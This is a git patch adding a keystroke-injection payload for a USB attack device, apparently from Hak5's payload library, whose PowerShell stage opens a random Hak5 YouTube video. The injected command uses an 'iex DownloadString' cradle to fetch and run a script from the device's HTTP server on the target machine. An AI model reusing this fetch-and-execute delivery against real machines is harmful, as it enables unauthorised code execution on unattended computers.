From 946879ae909f7b4f807f89d784ec07a1acf8c710 Mon Sep 17 00:00:00 2001 From: cribb-it <24548670+cribb-it@users.noreply.github.com> Date: Wed, 16 Mar 2022 21:28:18 +0000 Subject: [PATCH] New Payload - Random vid (#504) * readme * Payload --- .../general/Win_PoSH_RandomVid/payload.txt | 33 +++++++++++++++++++ .../general/Win_PoSH_RandomVid/readme.md | 24 ++++++++++++++ payloads/library/general/Win_PoSH_RandomVid/s | 24 ++++++++++++++ 3 files changed, 81 insertions(+) create mode 100644 payloads/library/general/Win_PoSH_RandomVid/payload.txt create mode 100644 payloads/library/general/Win_PoSH_RandomVid/readme.md create mode 100644 payloads/library/general/Win_PoSH_RandomVid/s diff --git a/payloads/library/general/Win_PoSH_RandomVid/payload.txt b/payloads/library/general/Win_PoSH_RandomVid/payload.txt new file mode 100644 index 00000000..1d2e874e --- /dev/null +++ b/payloads/library/general/Win_PoSH_RandomVid/payload.txt @@ -0,0 +1,33 @@ +#!/bin/bash +# Title: Random Video +# Description: Downloads a list of vids from YouTube. Then pick a random one then opens it. +# Author: Cribbit +# Version: 1.0 +# Category: General +# Target: Windows (Powershell 5.1+) +# Attackmodes: RNDIS_ETHERNET HID + +LED SETUP +ATTACKMODE RNDIS_ETHERNET HID + +GET SWITCH_POSITION +GET HOST_IP + + +cd /root/udisk/payloads/$SWITCH_POSITION/ + +# starting server +LED SPECIAL + +# disallow outgoing dns requests so server starts immediately +iptables -A OUTPUT -p udp --dport 53 -j DROP +python -m SimpleHTTPServer 80 & + +# wait until port is listening +while ! nc -z localhost 80; do sleep 0.2; done + +# attack commences +LED ATTACK +QUACK DELAY 300 +RUN WIN "powershell -C \"iex (New-Object Net.WebClient).DownloadString('http://$HOST_IP/s')\"" +LED FINISH \ No newline at end of file diff --git a/payloads/library/general/Win_PoSH_RandomVid/readme.md b/payloads/library/general/Win_PoSH_RandomVid/readme.md new file mode 100644 index 00000000..7008f5fb --- /dev/null +++ b/payloads/library/general/Win_PoSH_RandomVid/readme.md @@ -0,0 +1,24 @@ +# Random Video +- Author: Cribbit +- Version: 1.0 +- Tested on: Windows 10 (Powershell 5.1+) +- Category: General +- Attackmode: HID & RNDIS_ETHERNET +- Extensions: Run + +## Change Log +| Version | Changes | +| ------- | --------------- | +| 1.0 | Initial release | + +## Description +Downloads a list of Hak5 vids from YouTube (about 15 in the rss feed). + +Then pick one at random, then opens it in the browser. + +## Colours +| Status | Colour | Description | +| -------- | ----------------------------- | --------------------------- | +| SETUP | Magenta solid | Setting attack mode | +| ATTACK | Yellow single blink | Injecting Powershell script | +| FINISHED | Green blink followed by SOLID | Injection finished | \ No newline at end of file diff --git a/payloads/library/general/Win_PoSH_RandomVid/s b/payloads/library/general/Win_PoSH_RandomVid/s new file mode 100644 index 00000000..20ddb97b --- /dev/null +++ b/payloads/library/general/Win_PoSH_RandomVid/s @@ -0,0 +1,24 @@ +# Get the RSS feed for the Hak5 Channel +Write-Output "Connecting to youtube" +$Response = Invoke-WebRequest -Uri "https://www.youtube.com/feeds/videos.xml?channel_id=UC3s0BtrBJpwNDaflRSoiieQ" -UseBasicParsing -ContentType "application/xml" +Write-Output $Response.StatusCode +# See if it successful +If ($Response.StatusCode -eq "200") { + # set the XML + $Xml = [xml]$Response.Content + $Entries = @() + # Loop each entry creating an object + ForEach ($Entry in $Xml.feed.entry) { + $Entries += [PSCustomObject] @{ + 'Updated' = [datetime]$Entry.updated + 'Title' = $Entry.title + 'Link' = $Entry.Link.href + } + } + # Gets a random number + $int = (Get-Random -Maximum ($Entries.Count -1) -Minimum 0) + $Entry = $Entries[$int] + # Opens link + Start-Process $Entry.Link + Write-Output $Entry.Title +} \ No newline at end of file